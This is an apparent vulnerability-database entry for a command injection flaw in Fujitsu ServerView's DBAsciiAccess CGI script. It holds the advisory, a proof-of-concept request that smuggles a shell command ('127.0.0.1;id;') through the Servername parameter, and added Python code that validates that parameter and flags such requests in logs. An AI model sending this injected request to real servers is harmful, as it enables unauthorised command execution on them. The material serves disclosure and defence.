Fujitsu ServerView DBAsciiAccess Script Remote Code Execution Vulnerability

Vulnerability ID: 1113239    Vulnerability type: input validation
Published: 2007-07-03    Updated: 2007-07-05
CVE ID: CVE-2007-3011    CNNVD ID: CNNVD-200707-062
Platform: Multiple    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/30264
https://www.securityfocus.com/bid/24762
https://cxsecurity.com/issue/WLB-2007070013
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-062
|Vulnerability details
ServerView is an asset management tool used for automated analysis and version maintenance. The ServerView web interface has an input validation vulnerability when it handles user-supplied data; a remote attacker could exploit it to execute arbitrary commands on the server with the privileges of the web process. The DBAsciiAccess CGI script provides a ping function. The Servername sub-parameter of the script's ParameterList parameter supplies the IP address to be pinged, but no check of any kind is performed on this IP address. By appending a trailing semicolon to the IP address, an attacker can inject arbitrary shell commands, which are executed with the privileges of the web server process.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/24762/info

Fujitsu ServerView is prone to a remote command-execution vulnerability because it fails to adequately sanitize user-supplied data.

Attackers can exploit this issue to execute arbitrary commands with the privileges of the affected application. Successful attacks will compromise the application and underlying webserver; other attacks are also possible.

Versions prior to Fujitsu ServerView 4.50.09 are vulnerable. 

http://www.example.com/cgi-bin/ServerView/
SnmpView/DBAsciiAccess
?SSL=
&Application=ServerView/SnmpView
&Submit=Submit
&UserID=1
&Profile=
&DBAccess=ASCII
&Viewing=-1
&Action=Show
&ThisApplication=TestConnectivityFrame
&DBElement=ServerName
&DBValue=bcmes
&DBList=snism
&UserValue=
&DBTableList=SERVER_LIST
&Sorting=
&ParameterList=What--primary,,
OtherCommunity--public,,
SecondIP--,,
Timeout--5,,
Community--public,,
ServerName--bcmes,,
Servername--127.0.0.1;id;,, # vulnerable parameter
SType--Server
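The defect described above is the absence of any validation of the Servername value before it reaches ping. The following added example (not code from the advisory, the exploit author or Fujitsu) shows what that missing check looks like on the server side, and the same check reused as a log-review rule. It assumes the `key--value,,` layout of ParameterList seen in the request above, a combined-format access log, and that a legitimate ping target is always a bare IP address literal; the log lines are constructed for the example.

```python
"""Validate the Servername sub-parameter of the DBAsciiAccess ParameterList
and flag access-log requests that carry a non-IP value in it.
Added example; the 'key--value,,' layout is taken from the PoC request above."""
import ipaddress
import re
from urllib.parse import urlsplit, parse_qs

# Shell metacharacters that must never reach a command line built around ping(8).
SHELL_META = re.compile(r"""[;&|`$()<>\\"'\r\n]""")


def parse_parameter_list(value: str) -> dict:
    """Split 'What--primary,,Timeout--5,,...' into {'What': 'primary', 'Timeout': '5', ...}."""
    entries = {}
    for item in value.split(",,"):
        if not item:
            continue
        key, sep, val = item.partition("--")
        if not sep:
            raise ValueError("malformed ParameterList entry: %r" % item)
        entries[key] = val
    return entries


def validate_servername(target: str) -> tuple:
    """Return (ok, reason). Only a bare IPv4/IPv6 literal is accepted."""
    if SHELL_META.search(target):
        return False, "shell metacharacter in Servername"
    try:
        ipaddress.ip_address(target)
    except ValueError:
        return False, "Servername is not an IP address literal"
    return True, "ok"


def check_parameter_list(value: str) -> tuple:
    """Parse a whole ParameterList value and validate its Servername entry."""
    params = parse_parameter_list(value)
    return validate_servername(params.get("Servername", ""))


# Constructed access-log lines (combined log format). The first mirrors the PoC request
# with the separators URL-encoded, the second is a benign ping of 127.0.0.1, the third
# is unrelated traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Jul/2007:10:00:00 +0200] "GET /cgi-bin/ServerView/SnmpView/DBAsciiAccess'
    '?Action=Show&ParameterList=What--primary,,Servername--127.0.0.1%3Bid%3B,,SType--Server HTTP/1.1" 200 512',
    '10.0.0.6 - - [04/Jul/2007:10:00:05 +0200] "GET /cgi-bin/ServerView/SnmpView/DBAsciiAccess'
    '?Action=Show&ParameterList=What--primary,,Servername--127.0.0.1,,SType--Server HTTP/1.1" 200 512',
    '10.0.0.7 - - [04/Jul/2007:10:00:09 +0200] "GET /index.html HTTP/1.1" 200 1024',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_log_lines(lines) -> list:
    """Return (client_ip, reason) for each DBAsciiAccess request whose Servername fails validation."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/DBAsciiAccess"):
            continue
        # parse_qs percent-decodes, so %3B is already ';' when it reaches the validator.
        for plist in parse_qs(url.query).get("ParameterList", []):
            ok, reason = validate_servername(parse_parameter_list(plist).get("Servername", ""))
            if not ok:
                hits.append((line.split()[0], reason))
    return hits


if __name__ == "__main__":
    print(check_parameter_list("Servername--127.0.0.1"))
    print(check_parameter_list("Servername--127.0.0.1;id;"))
    print(flag_log_lines(SAMPLE_LOG))
```

The metacharacter check runs first so that a rejected request is logged with the reason that matters for triage; the IP-literal check then rejects anything else that is not a plain address, which is the allow-list behaviour the script should have had. When reviewing real logs, remember that only requests that were actually recorded with their query string are visible this way; a POST body would need the application's own logging.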
|Affected products
Fujitsu ServerView 4.50.8
Fujitsu ServerView 4.50.7
Fujitsu ServerView 4.50.6
Fujitsu ServerView 4.50.5
Fujitsu ServerView 4.50.4
Fujitsu ServerView 4.50.3
|References

Source: BID
Name: 24762
Link: http://www.securityfocus.com/bid/24762
Source: BUGTRAQ
Name: 20070704 Fujitsu-Siemens ServerView Remote Command Execution
Link: http://www.securityfocus.com/archive/1/archive/1/472800/100/0/threaded
Source: MISC
Link: http://www.redteam-pentesting.de/advisories/rt-sa-2007-002.php
Source: SECUNIA
Name: 25944
Link: http://secunia.com/advisories/25944
Source: OSVDB
Name: 37835
Link: http://osvdb.org/37835
Source: XF
Name: serverview-servername-command-execution(35257)
Link: http://xforce.iss.net/xforce/xfdb/35257
Source: VUPEN
Name: ADV-2007-2441
Link: http://www.frsirt.com/english/advisories/2007/2441
Source: SREASON
Name: 2858
Link: http://securityreason.com/securityalert/2858